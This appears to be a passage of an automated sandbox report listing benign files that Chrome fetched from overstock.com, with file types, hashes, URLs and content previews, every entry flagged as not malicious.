                                                                                                                                                                                    Preview:(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[714],{7228:function(e){e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n},e.exports.__esModule=!0,e.exports.default=e.exports},2858:function(e){e.exports=function(e){if(Array.isArray(e))return e},e.exports.__esModule=!0,e.exports.default=e.exports},3646:function(e,t,r){var n=r(7228);e.exports=function(e){if(Array.isArray(e))return n(e)},e.exports.__esModule=!0,e.exports.default=e.exports},8926:function(e){function t(e,t,r,n,i,o,s){try{var a=e[o](s),u=a.value}catch(e){return void r(e)}a.done?t(u):Promise.resolve(u).then(n,i)}e.exports=function(e){return function(){var r=this,n=arguments;return new Promise((function(i,o){var s=e.apply(r,n);function a(e){t(s,i,o,a,u,"next",e)}function u(e){t(s,i,o,a,u,"throw",e)}a(void 0)}))}},e.exports.__esModule=!0,e.exports.default=e.exports},9713:function(e){e.exports=function(e,t,r){return t in e?Object.defineProp
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3176
                                                                                                                                                                                    Entropy (8bit):7.537511968115568
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:EIl/XflmThCPz91izYixQ2orSzEabj+mhvOOYQK5z40Fgf91Y7QfQdZZ2:EIl/XECboY1Swabj+dUGz4s2O7EeZ2
                                                                                                                                                                                    MD5:576C7D22FBBADD6710792D02369EFE69
                                                                                                                                                                                    SHA1:F155A622CCDF474D83FC2865EDDF8B684AF0150E
                                                                                                                                                                                    SHA-256:7E356F8179D3F0EBAB604D45F2100A258A7C1EB6F0B1F2FEE095D36C8F4E7FA3
                                                                                                                                                                                    SHA-512:FB9B0793208142EF4C3CBA4C67560208A7BDAF23CDD9F5815E15B03932E853515B6CBFA25898620D2B3D37CF67DFAE4B7BC6C891DE6FE5673E6373BAC0B9516E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_76f9ab1d-e29b-495e-a3fb-3a4a4847dd73.jpg?v=1729325108&width=80
                                                                                                                                                                                    Preview:RIFF`...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....&...*P.P.>1..C.!!... ....[}...H...o.jo...b...#...8.\..i../.x#.W...._e...W.G......g.....Y...../....}t.]...g...@?..g.m.7.O./C.M...+..........?.L.... ..Et..`....D..<..O...tS?.8./...V..[........9.2...?.Q.A;p...Y:...i.nk.44P{=|....._..h....K.&nN..s68{.4.....G.|..]0#.. ~..t..F.8B.P...&...?..-.:....F.v..H..\.....r.7-X.........Q..p]..#....^....SW.Y_t..].....}...h.....5....).W..Z>.kXB....n.JT..?.O..s..... ..?...F/....|.+.o.I..f."..o.........z.2.....,...t.. .9....W`.gx,0...QawiO.'.A?.v..9v..2....IZ.e.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3208
                                                                                                                                                                                    Entropy (8bit):7.32587348148077
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxo9S6LAVygyjeJgJ8x6t4eA1eOC2uL/A6O53A9AOETdR:NBIl/XrxCSJGKm8s4e0ls/1O5A9WTdR
                                                                                                                                                                                    MD5:482926F4FA97C67E4BC4566FA41C2E5E
                                                                                                                                                                                    SHA1:88FD24D8947184A86B2947F6807526A77D99DD2B
                                                                                                                                                                                    SHA-256:0BB274B48787F4B34D18BF97FB16438C074D8C2F206EA036D2B97F0FD4595B55
                                                                                                                                                                                    SHA-512:258E2743AD74FFB43E09C3490B75AFF63618263E05A91D459C350C9D5D815AA58033E250AC6E21723C34DF5221CCC8EA148E0A7A0BAF0E127D6EB31540C89013
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................`..h....~.2ew-....K.V:J...6{$...h....x..p...M.-.......{:{..y.-W.>..........D...A..E..4.......M(r..M..|.&6M.I.[!..n.V.b.$.i.s.....?.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2440)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5533
                                                                                                                                                                                    Entropy (8bit):4.4602873273275305
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:xF5XCq45hSJpS6BMSHq2Hq3m4pI96Cq0y9jTXdHjyJtCEO/H+Cuizv8aZX7kVPve:dXCqMhSJpS6BMSHq2Hq3m4pI96Cq0yJz
                                                                                                                                                                                    MD5:BC2E06193D924F9AC91286F1E868C62C
                                                                                                                                                                                    SHA1:9C7719E899853C2F9F1B5A4F3FFC0C003BAEA6EB
                                                                                                                                                                                    SHA-256:E57319061FCD43F33918B643407C439049E96EFB328492355E774DEBCE7A27AF
                                                                                                                                                                                    SHA-512:532FF25EC08CF3DDA2CB6D122FD07D815AC46B9318DA37B0991256FA9296F6ED8E482579AB041E7208480FA94BE1FF1394F54ED1678A832102C012908E360794
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/storefrontapi.js
                                                                                                                                                                                    Preview:export const storeFrontRequest=async({query,variables={}})=>{const apiVersion=window?.DOMAINE?.technical?.apiVersion,shopName=window?.DOMAINE?.technical?.shopName,storefrontToken=window?.DOMAINE?.technical?.storefrontToken,queries={queryProductById:`. query getProductById($id: ID!, $imageCursor: String, $mediaCursor: String) {. product(id: $id) {. onlineStoreUrl. availableForSale. handle. title. images(first: 250, after: $imageCursor) {. pageInfo {. hasNextPage. endCursor. }. edges {. node {. alt: altText. height. id. src: url(transform: { preferredContentType: WEBP }). width. }. }. }. media(first: 250, after: $mediaCursor) {. pageInfo {. hasNextPage. endCursor. }. edges {.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2688480
                                                                                                                                                                                    Entropy (8bit):5.318811787326861
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:jAdZ+nNoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+YGK2L3R:jA+GsUBYLFr1+Vz
                                                                                                                                                                                    MD5:07E81DF03855A3D7B7934867469C1D1F
                                                                                                                                                                                    SHA1:1E59D265AF3717900228604E6B0F733C66A24DA3
                                                                                                                                                                                    SHA-256:F8A96D04E68E88C358993018C49CDE276FDBB99BCB24FEA1A32A7BA53BF7959B
                                                                                                                                                                                    SHA-512:7BAFF89F41B1683DAC28C1773A780EC823692C0DF721659A00CE08EDD7B40FB442A76B1445C2819250FB5AD6960E56993F1F57BDEE458199F12D161937D36687
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/collections/furniture
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/collections/furniture").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path === '/
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):122268
                                                                                                                                                                                    Entropy (8bit):5.502153642847958
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:piTTazaMI1iO6Wd6BUbroMoLc8rVA9ZIIsl5OyJE1PyvGVFuH2rOrb+I49pk84dr:piTTazaMI1iO6Wd6BUbroMoLc8rVA9Z2
                                                                                                                                                                                    MD5:2741C0215D4ABAC38BD8FE47B3BB8E4A
                                                                                                                                                                                    SHA1:EB03E88549B9CC9AD39BC96D7E8AA16AD3A31B0B
                                                                                                                                                                                    SHA-256:048D99B0C73DBBC91EAAC4E825CB7BD1C3C9DEF4FB68E26F4261C9D85A543C9D
                                                                                                                                                                                    SHA-512:B84408408C3D914FD5F816B2257593C9152EF0013AE8EDB816D9B186B5811EC506D17B29F4334D12010FB3EAEA29BD13B5BAD4182B8DE71BBC33991785EB54DC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/rul/1069816607?random=1730294606280&cv=11&fst=1730294606280&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za200&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533421~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                    Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":46656000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1585853498.1730294602","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1585853498.1730294602\u0026ig_key=1sNHMxNTg1ODUzNDk4LjE3MzAyOTQ2MDI!2saeodTw!3sAAptDV5wGBcS\u0026tag_eid=44800267","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1s_UN3RQ!2saeodTw!3sAAptDV5wGBcS","1i44800267"],"userBiddingSignals":[["7281796879","7280788808","7281791302","7281796819","7280786036","7281797089","7280788529","7282194600","72
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (19843), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):19843
                                                                                                                                                                                    Entropy (8bit):5.136893808309075
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:i5F+kuVMnhBwMe0qMvbTQoXR7E9GeEIALcnhBwMeaqh1bTQoXRQu9lxW/tWJcxas:i5x933p9qFMSgm58yle+
                                                                                                                                                                                    MD5:B9CFE972CF2284799D155BF66B82ECB5
                                                                                                                                                                                    SHA1:2EC817E6B3AEB87609F3F18E25A21FD30A13ED1B
                                                                                                                                                                                    SHA-256:FB3B732F9DD31956D34CBD679C3E0DEAC1B4B35DAB9F6FE8D92F3F6C63DF5DCE
                                                                                                                                                                                    SHA-512:5F77BE2B4505BC01A68469A1727576C02168AA5346862232490EF0917096D6B48419E2A5727D252A22943EC467810EBC4EC34E2A6CB88E8158F1946C9A93EAEE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/os-async.5.0.10.min.fb3b732f9dd31956d34cbd679c3e0deac1b4b35dab9f6fe8d92f3f6c63df5dce.js
                                                                                                                                                                                    Preview:!function(){function a(b,c,d){function e(g,h){if(!c[g]){if(!b[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0);if(f)return f(g,!0);var j=new Error("Cannot find module '"+g+"'");throw j.code="MODULE_NOT_FOUND",j}var k=c[g]={exports:{}};b[g][0].call(k.exports,function(a){var c=b[g][1][a];return e(c||a)},k,k.exports,a,b,c,d)}return c[g].exports}for(var f="function"==typeof require&&require,g=0;g<d.length;g++)e(d[g]);return e}return a}()({1:[function(a,b,c){var d=a("./lib"),e=a("./lib/loginlayer.js");b.exports={LLModule:d,LLExt:e}},{"./lib":3,"./lib/loginlayer.js":4}],2:[function(a,b,c){"use strict";var d="\n .login-layer-page-mask {\n position: absolute;\n top: 0;\n z-index: 99991;\n width: 100%;\n height: 7000px;\n background-color: rgba(0, 0, 0, 0.55);\n }\n\n .login-layer-page-mask .os-spinner {\n position: absolute;\n top: 50%;\n left: 50%;\n margin-top: -15px;\n margin-left: -15
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1760
                                                                                                                                                                                    Entropy (8bit):6.969159897743938
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:vTCIl/X2YlXWI2PU6FGIWY17O/i8zljdGnIGgnNUnPAXlHQd5gdnfFjF8bHov:OIl/XflWOYQqUlhGnKKMpQdg2Iv
                                                                                                                                                                                    MD5:678B58038254F07F033364C34DE4B79B
                                                                                                                                                                                    SHA1:A4E9F5511131F543DFFE5EB7230FC048D79388FE
                                                                                                                                                                                    SHA-256:E82AE5F04C470724474FF4949549A5395D50C931D3635888E32B28C8F3C92969
                                                                                                                                                                                    SHA-512:1EDDCA261E5D3C1A5B9D035BD1FDBAEBF8E0874EEED6D8DE7B26F2D2D250A081697E9F895A20757A9D140C8982EDE032C261A70C0B92EDB28FF230AD003255D0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_c4c81f89-a1db-4b85-a644-3166db1971bd.jpg?v=1729325107&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 H........*P.P.>)..B.......BZ@3.t.......B...w.,.;b9_#/.^m.j............n_y7wC.... ..,.?>...3..W{...;.v".b.:.....E+..9..r...;.......Ri..@.(:..i2....K.Xee.6..............&.,.E..X..G~7.....!<.ht.V..o...GC...}.9....G.*../d.....'%.^..|bX.q..-9|M.....>..H9Yb..=.i....b...7..".w9...N..a.u8.9.r-..V.u.....m...*rv.......|..'.rm=~..6.V....[ dz/.<3.f..an.....yA.D&....D........I.7....".}1.X.*.6./".'`{.f....Cd.=.qla.)..M.S.[P....8J....S.E....$..x..&Dx<J.k..X...F.[....x'.g......=.V.o.....H...E`......;.i..;2]n..$.-4...@.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):77
                                                                                                                                                                                    Entropy (8bit):4.37144473219773
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:k0WYL12AvZ/W6QfpX/W6Qee:UYR2AvZO6EpXO6I
                                                                                                                                                                                    MD5:B6652DF95DB52FEB4DAF4ECA35380933
                                                                                                                                                                                    SHA1:65451D110137761B318C82D9071C042DB80C4036
                                                                                                                                                                                    SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                                                                                                                                                                                    SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2911
                                                                                                                                                                                    Entropy (8bit):7.263706023281934
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxxzTTB07XqNjNU4zOEhS0VA//ombPEUFY7:NBIl/XrxxkqNid/0VubPEUFa
                                                                                                                                                                                    MD5:59E0B0FA153C478F4D33C4A73E6A8311
                                                                                                                                                                                    SHA1:1E4BB7C17A84D9A1834DC991B88BE3CF39B8AC28
                                                                                                                                                                                    SHA-256:B0C2799A80899627F5631E5F0BE48E28BEFE32F957538F055DFACCE138D9B885
                                                                                                                                                                                    SHA-512:F7FA4750049C82B91DD2AC4288B0DD53FE87A9CA9774F9EB3A533E4D80F6E328693C6FD07AFC11E80791E803906057F2D9FC97F406112E313035B60BA6CCAEFB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................`....{.....4.......=.M..v..................Iku.oU...#...6.E..l..:.B......{t...R.]Z..91r.dT.=......N3.....cq.A!.$.....c..S...1f..S,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2732
                                                                                                                                                                                    Entropy (8bit):7.424312931908716
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:WIl/XflztE7XRBIcgSEE8xL+17Z3OFwFBxEej0m2lfq:WIl/X4hLeE8xk93OCFv5gvlfq
                                                                                                                                                                                    MD5:2F5FDD14639B73AC69EE317245E80B61
                                                                                                                                                                                    SHA1:051B5E036B31B86090C7F7F984F6664A30716DE6
                                                                                                                                                                                    SHA-256:043645AE36582C344747BDD4EE5CF6A44888B8ED712BEB788D1D8CD0154F1351
                                                                                                                                                                                    SHA-512:A9FB416374E78C7DE0573DA79124379F7BEFDD58D7D6F6BC678AC89A9D83D1A69EE72BE32DD3B8ADAB4B15CF9B59F7325A60E1510439A1AB20F410EF9682F742
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_20aeb44a-be7c-4457-a867-31b2b64017a9.jpg?v=1729322907&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>-..B.....l..bY@,G.c.'{.o.......}.y........_.q..O...e+.u.S...m..G.........}..u%.'*..g@.U.N>.6..W!:...c..L..8>..bq,x....Y..|E.x....VH.d..>....+.?.V...F...u`.J.NgX._.,.%9.+.v..z.l....5.:.]9.L.......]P.Y..t.'.a9.>r.Z......VRf.../.r.$....1.K.q..~.n...B..Y..^...iM.q.w......7.Y.Bcm..A.u.>....&.+G.o.....>......D.....X......i.Q<.o.sV.`.>......+.wQT...:...o..L...E.80.7...6.4+*. ..-.%t33.$.MB..t......@...l...5m..fh.n#p7.....(.Z....1..m9..uRy.n%...|X..~.....N..5C.G.j.V.Y{..W.n....8.. ..d...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):122
                                                                                                                                                                                    Entropy (8bit):5.1414427194822405
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:yWSMnNfGLf4eBrfRVAEiLTQFeSmxqeT7GEJMYBBxPRpEk:yWFu48UfLckFxqM72Y3xpT
                                                                                                                                                                                    MD5:61C47F2AC2B958728F19F61FA762D968
                                                                                                                                                                                    SHA1:24DB241FC0432F9A3D15FE084168905B1FABC208
                                                                                                                                                                                    SHA-256:C917950DADA8F6EDFD4CC12CF0DDCC72C4489AB700B6D43D1C61CFA6C40255B3
                                                                                                                                                                                    SHA-512:6F87B31E28A64E83B0996C9466E5EFBEE4E8B5FFC9603E130709EF86446558C500A2D43FEE324A62EC7135A4F594D5DBED808114C005F68F6A1A0DDB356561FA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/ShopPayLogo.D_HPU8Dh.css
                                                                                                                                                                                    Preview:._8ssCG{width:59px}.zS4x6{width:68px}.PrlUn{width:84px}.SsCEp{width:100px}.aTkbO{vertical-align:middle;margin-bottom:1px}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1340
                                                                                                                                                                                    Entropy (8bit):6.471561150866364
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:E5TCIl/X2YlXWI2PU2FXb9+O90K9T/Oe3S8MapzO9/ZK+KBZQwoQAF+s6:XIl/XflE+lK9KQzMszT5uYa6
                                                                                                                                                                                    MD5:1F313B86385C1A02CF3005230BD45186
                                                                                                                                                                                    SHA1:F3A9225B412FFFB290853D861FDD3E59B140E247
                                                                                                                                                                                    SHA-256:CCEFCED240960DC7AD3B65192C8220418B70ACFC37B963BC7EB16B9198736B9A
                                                                                                                                                                                    SHA-512:4D8D74F7DDC7A9AD3441021883E84CB3F2C1A789FC554BE41682FDA325A42D5F975EEC0603001E9C0EACC94AD1C43973228C8111B1444483A1CC67A142705DBA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_e57e693b-a9ba-461e-a50c-64a485f95b3f.jpg?v=1729322908&width=80
                                                                                                                                                                                    Preview:RIFF4...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....P....*P.P.>1..B.!!.Y=. ....jb.n&.......jB.2M.Y...{.......[..2h..ul..i.$*.|.)....Vs..q.ir.....S....Iq.....g.mML.._%.rW.H.....h......'-\...xA..h'.]....2.....2..\.x.n.'6.&k.).//....2.h...s..>f.e..T...W..$.v..`..s@.M.Hc.p*....n.7zp_....x..Q%C=.A..g$a.6....O.?6f.....W.P/.^V...h...n...r...XsL.........iA.D..9:..T..gh5|.7..p.G.PE."#....@.L.j.....ZZC6_. ...a.ogj..]...'..fnY5....B....d..".j..*.S9....S...X..d..3.........*.rbY..x..O.U.[...I\..|..dk"...m.I......i%d^..9..;..2....w.s.R.....m.M..i."........(. ...\......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x1024, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):335127
                                                                                                                                                                                    Entropy (8bit):7.991008968820188
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:6144:QNlFIbvonKgGIrt3gvIBs8inti465nT5D+9Gau+0uSMC0d4O:qzowmIrt3QIhintmD+Qa4N0/
                                                                                                                                                                                    MD5:01B68C54A666EC360A477349311E6005
                                                                                                                                                                                    SHA1:C25CD45EC4F23CC57571559793375DC7444180A7
                                                                                                                                                                                    SHA-256:3CF3B748AC988C4F1AB563F9232C553DC64074FC870E3C40AFCD5E11EE4274FF
                                                                                                                                                                                    SHA-512:B6DD67D8889A544BA5AFB712E21DA2BEAC64D69170699F649908359984A5E007A97736BA1416F976B3885E491A1B42C6BE1D6C74C3714960CA41B55DD228E5D8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................................................................!................................................................!..........."..........:........................................................................+..P...T.Z.M[XT...@.-Z.E...h.p..Ea.B....[.V.6.@!.B.{.t .P.VE...u.4...B.....0Gd.0.@...!T0....-.2.......l0.a.@..@.C...Aj...4.,.(.P...c..y`X...q.B.q..i.....I..F.4...<#.>.|......p.s....n..=..:.eb.&.cVM..3 ..8.qb....[..{G.s...{.<..T.U,X...^...;.t.....T...R...AF..aR.Q..{^.U.d(.@..4,....C....dhm{.]....Mqa.Y-....XAG.#.S.F.@.aG..4.....f.].-......X.....p(.......V..A.U.,...\a..&.E.`(F.... .`...4.7 .q.8.,.L.F;....1......$<_.......w.Y.~.{.E..(.....W..e.TO..8w..../j0K..s.].t....8.D).Z.c.Z.AUB..T...C{....e.B..B....(VP!2....qk^...aV....(.......aY...H....,wT...e.g...a.K.T...[.. K8.... F..$.X...[%...Qf..aP........6...z.0...1..7..."...tpFh..4`P.`............w.?.G7;.....%.W...Mc...(h. ].t...LE..{R.U.F...W.......T.Y...j....L...R.z.K..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):149805
                                                                                                                                                                                    Entropy (8bit):5.6004134683803555
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:Cnxj4bndhXdOU0tNo455wjdrm/bK+OTRMWMrvBDJTcitj+wf2EAeiPWMWNZVgdyo:Cnxj479OU03o4PwjhIBVT39ROyuvb
                                                                                                                                                                                    MD5:5693E74A87CDFE0DD8CF9E97ABC2EC67
